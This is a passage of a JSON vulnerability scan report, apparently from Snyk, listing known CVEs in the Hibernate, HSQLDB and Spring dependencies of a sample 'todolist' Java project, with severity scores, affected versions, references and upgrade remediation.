A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 
"org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - 
{ - "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - "epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" 
- ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": 
"https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 
"org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - 
"cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - 
"mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", - 
"title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.29.RELEASE", - "5.0.19.RELEASE", - "5.1.18.RELEASE", - "5.2.9.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.6, - "functions": [ - { - "version": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/web/util/WebUtils.java", - "className": "WebUtils", - "functionName": "parseMatrixVariables" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://tanzu.vmware.com/security/cve-2015-5211", - "title": "CVE-2015-5211" - }, - { - "url": "https://pivotal.io/security/cve-2020-5421", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:33.950462Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:07.572789Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:04.397840Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "assigner": 
